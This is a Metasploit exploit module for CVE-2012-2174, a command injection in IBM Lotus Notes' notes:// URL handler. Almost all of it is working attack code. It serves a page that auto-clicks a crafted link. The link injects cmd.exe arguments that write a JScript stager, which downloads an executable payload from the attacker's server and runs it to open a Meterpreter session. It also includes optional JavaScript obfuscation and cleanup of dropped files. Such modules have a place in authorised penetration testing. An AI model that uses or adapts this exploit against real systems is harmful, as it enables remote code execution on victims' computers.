IBM Lotus Notes Client URL Handler Command Injection

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "IBM Lotus Notes Client URL Handler Command Injection",  
'Description' => %q{  
This modules exploits a command injection vulnerability in the URL handler for  
for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with  
an specially crafted notes:// URL to execute arbitrary commands with also arbitrary  
arguments. This module has been tested successfully on Windows XP SP3 with IE8,  
Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Moritz Jodeit', # Vulnerability discovery  
'Sean de Regge', # Vulnerability analysis  
'juan vazquez' # Metasploit  
],  
'References' =>  
[  
[ 'CVE', '2012-2174' ],  
[ 'OSVDB', '83063' ],  
[ 'BID', '54070' ],  
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ],  
[ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ],  
[ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ]  
],  
'Payload' =>  
{  
'Space' => 2048,  
'StackAdjustment' => -3500  
},  
'DefaultOptions' =>  
{  
'EXITFUNC' => "none",  
'InitialAutoRunScript' => 'migrate -k -f'  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Automatic', {} ]  
],  
'Privileged' => false,  
'DisclosureDate' => "Jun 18 2012",  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])  
], self.class)  
end  
  
def exploit  
@exe_name = rand_text_alpha(2) + ".exe"  
@stage_name = rand_text_alpha(2) + ".js"  
super  
end  
  
def on_new_session(session)  
if session.type == "meterpreter"  
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")  
end  
  
@dropped_files.delete_if do |file|  
win_file = file.gsub("/", "\\\\")  
if session.type == "meterpreter"  
begin  
wintemp = session.fs.file.expand_path("%TEMP%")  
win_file = "#{wintemp}\\#{win_file}"  
# Meterpreter should do this automatically as part of  
# fs.file.rm(). Until that has been implemented, remove the  
# read-only flag with a command.  
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)  
session.fs.file.rm(win_file)  
print_good("Deleted #{file}")  
true  
rescue ::Rex::Post::Meterpreter::RequestError  
print_error("Failed to delete #{win_file}")  
false  
end  
  
end  
end  
  
end  
  
def on_request_uri(cli, request)  
  
if request.uri =~ /\.exe$/  
return if ((p=regenerate_payload(cli))==nil)  
register_file_for_cleanup("#{@stage_name}") unless @dropped_files and @dropped_files.include?("#{@stage_name}")  
register_file_for_cleanup("#{@exe_name}") unless @dropped_files and @dropped_files.include?("#{@exe_name}")  
data = generate_payload_exe({:code=>p.encoded})  
print_status("Sending payload")  
send_response(cli, data, {'Content-Type'=>'application/octet-stream'})  
return  
end  
  
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']  
if datastore['SSL']  
schema = "https"  
else  
schema = "http"  
end  
uri = "#{schema}://#{my_host}"  
uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe"  
  
script = "var w=new ActiveXObject('wscript.shell');"  
script << "w.CurrentDirectory=w.ExpandEnvironmentStrings('\\%TEMP\\%');"  
script << "var x=new ActiveXObject('Microsoft.XMLHTTP');"  
script << "x.open('GET','#{uri}', false);"  
script << "x.send();"  
script << "var s=new ActiveXObject('ADODB.Stream');"  
script << "s.Mode=3;"  
script << "s.Type=1;"  
script << "s.Open();"  
script << "s.Write(x.responseBody);"  
script << "s.SaveToFile('#{@exe_name}',2);"  
script << "w.Run('#{@exe_name}');"  
  
vmargs = "/q /s /c echo #{script} > %TEMP%\\\\#{@stage_name}& start cscript %TEMP%\\\\#{@stage_name}& REM"  
  
link_id = rand_text_alpha(5 + rand(5))  
  
js_click_link = %Q|  
function clickLink(link) {  
var cancelled = false;  
  
if (document.createEvent) {  
var event = document.createEvent("MouseEvents");  
event.initMouseEvent("click", true, true, window,  
0, 0, 0, 0, 0,  
false, false, false, false,  
0, null);  
cancelled = !link.dispatchEvent(event);  
}  
else if (link.fireEvent) {  
cancelled = !link.fireEvent("onclick");  
}  
  
if (!cancelled) {  
window.location = link.href;  
}  
}  
|  
  
if datastore['OBFUSCATE']  
js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)  
js_click_link.obfuscate  
js_click_link_fn = js_click_link.sym('clickLink')  
else  
js_click_link_fn = 'clickLink'  
end  
  
  
html = <<-EOS  
<html>  
<head>  
<script>  
#{js_click_link}  
</script>  
</head>  
<body onload="#{js_click_link_fn}(document.getElementById('#{link_id}'));">  
<a id="#{link_id}" href="notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\windows\\system32\\cmd.exe -vmargs #{vmargs}"></a>  
</body>  
</html>  
EOS  
  
print_status("Sending html")  
send_response(cli, html, {'Content-Type'=>'text/html'})  
  
end  
  
end`